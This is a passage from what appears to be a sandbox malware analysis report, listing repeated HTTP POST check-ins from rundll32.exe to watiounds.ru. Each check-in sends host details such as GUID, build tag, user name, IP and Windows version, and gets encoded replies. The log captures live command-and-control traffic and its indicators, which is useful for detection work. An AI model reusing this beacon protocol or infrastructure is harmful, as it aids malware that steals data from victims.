                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:10.562772036 CEST297INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          235192.168.2.224940095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:10.877664089 CEST298OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:11.004592896 CEST298INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 48 53 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYHSBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          236192.168.2.224940195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:11.329940081 CEST299OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:11.454822063 CEST299INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:11 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 51 4a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAQJZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          237192.168.2.224940295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:11.790491104 CEST300OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:11.914313078 CEST301INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:11 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 51 4a 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYQJBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          238192.168.2.224940395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:12.235331059 CEST301OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:12.359030962 CEST302INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:12 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 56 45 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYVEBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          239192.168.2.224940495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:12.683267117 CEST303OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:12.812541008 CEST303INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:12 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZMNAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          24192.168.2.224918995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:34.212894917 CEST62OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:34.335050106 CEST62INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:34 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 43 58 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCCXXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          240192.168.2.224940595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:13.142980099 CEST304OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:13.271701097 CEST304INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:13 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFKPUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          241192.168.2.224940695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:13.599517107 CEST305OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:13.728627920 CEST305INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:13 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 56 45 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYVEBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          242192.168.2.224940795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:14.050673962 CEST306OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:14.178497076 CEST306INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:14 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 4e 4d 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHNMSARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          243192.168.2.224940895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:14.503915071 CEST307OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:14.632711887 CEST307INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:14 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCAZXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          244192.168.2.224940995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:14.946423054 CEST308OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:15.074197054 CEST308INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 4a 51 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBJQYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          245192.168.2.224941095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:15.399101019 CEST309OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:15.522481918 CEST310INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 54 47 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNTGMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          246192.168.2.224941195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:15.839217901 CEST310OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:15.961679935 CEST311INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 5a 41 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCZAXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          247192.168.2.224941295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:16.281735897 CEST311OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:16.405208111 CEST312INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:16 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 54 47 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVTGEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          248192.168.2.224941395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:16.726711035 CEST313OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:16.850367069 CEST313INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:16 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 4a 51 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHJQSARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          249192.168.2.224941495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:17.170702934 CEST314OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:17.299146891 CEST314INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZAZAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          25192.168.2.224919095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:34.651612997 CEST63OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:34.775614023 CEST63INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:34 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 4b 50 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQKPJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          250192.168.2.224941595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:17.616823912 CEST315OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
